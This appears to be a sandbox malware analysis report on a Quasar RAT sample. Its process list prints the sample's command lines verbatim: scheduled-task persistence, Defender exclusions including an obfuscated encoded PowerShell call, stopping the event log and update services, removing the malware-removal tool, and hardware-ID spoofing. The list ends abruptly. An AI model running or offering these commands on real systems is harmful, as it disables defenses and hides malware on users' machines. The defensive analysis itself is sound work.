Malware Analysis Report

2025-01-18 04:32

Sample ID: 240105-nxpkdabhe6
Target: 0c0dc0cf41e3c993ae5a22803275949abin.zip
SHA256: 01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f
Tags: quasar office04 evasion persistence spyware trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f

Threat Level: Known bad

The file 0c0dc0cf41e3c993ae5a22803275949abin.zip was found to be: Known bad.

Malicious Activity Summary

Tags: quasar office04 evasion persistence spyware trojan

Analyst note (everything here is taken from the behavioral1 process, network and file records further down; the static pass only flagged an unsigned PE). The sample drops a Quasar client at C:\Users\Admin\AppData\Roaming\SubDir\Client.exe and then installs further copies under system-binary names in non-system locations: conhost.exe under C:\Program Files\Google, dllhost.exe under C:\Recovery\<guid>, audiodg.exe under C:\MSOCache, System.exe under C:\Windows\TAPI and wininit.exe under C:\Program Files (x86)\Microsoft Sync Framework. Each is registered with schtasks.exe two or three times (an ONLOGON trigger plus a 5-14 minute repeat, most of them with /rl HIGHEST). Microsoft Defender exclusions are added for every one of those paths and then for the whole user profile, ProgramData and system drive; one Add-MpPreference call is passed as -EncodedCommand, and its decoded script has <# #> block comments spliced between the tokens, which defeats naive string matching on the command line but not on the decoded payload.

Three legitimate utilities are staged in C:\ProgramData\Microsoft\Windows and deleted afterwards: AMI's AMIDEWINx64.exe (with its amifldrv64.sys driver) rewrites SMBIOS/DMI identity strings and the system UUID (/SU auto), Sysinternals Volumeid64.exe re-serials every drive letter from a: to z:, and NirSoft DevManView.exe uninstalls disk, USBSTOR, WAN Miniport and storage device entries. This is hardware-ID spoofing, consistent with the dropped SPOOFER.exe and HpsrSpoof.exe. After C:\ProgramData\VC_redist.x64.exe is launched, the tree shows a service named driverupdate created with that binary as its auto-start binpath, the update-related services wuauserv, bits, dosvc, WaaSMedicSvc and UsoSvc stopped, the Malicious Software Removal Tool (KB890830) uninstalled, and all standby/hibernate timeouts zeroed with powercfg. It also runs sc stop eventlog, so any host telemetry that depends on the Windows Event Log after that point is unreliable; the process tree in this report is the sandbox's own record, not EventLog-derived.

C2 is brofisthej.ddns.net (2.70.186.204, SE) over TCP/4822, with four sessions in the run. The other contacts are pastebin.com (443), gaming7core.info (45.15.156.156, port 80, twice), ipinfo.io (external IP lookup) and apps.identrust.com over port 80 (IdenTrust certificate repository, most likely chain building by the OS for the TLS connections).

Quasar payload

Quasar RAT

Process spawned unexpected child process

Nirsoft

Creates new service(s)

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-01-05 11:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-01-05 11:46

Reported: 2024-01-05 11:49

Platform: win7-20231215-en

Max time kernel: 0s

Max time network: 147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\conhost.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Google\conhost.exe'" /f

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe

"C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe"

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728449HP-TRGT32560MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328445HP-TRGT21812DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628445HP-TRGT21812FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428445HP-TRGT21812FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528445HP-TRGT21812SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828445HP-TRGT21812SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228445HP-TRGT21812RV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28445HP-TRGT21812AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728465HP-TRGT20767MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628465HP-TRGT20767FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328465HP-TRGT20767DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528465HP-TRGT20767SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428465HP-TRGT20767FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828465HP-TRGT20767SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228465HP-TRGT20767RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328481HP-TRGT8973DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728481HP-TRGT8973MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628481HP-TRGT8973FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528481HP-TRGT8973SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428481HP-TRGT8973FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828481HP-TRGT8973SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228481HP-TRGT8973RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28481HP-TRGT8973AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28465HP-TRGT20767AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ

C:\Windows\System32\cmd.exe

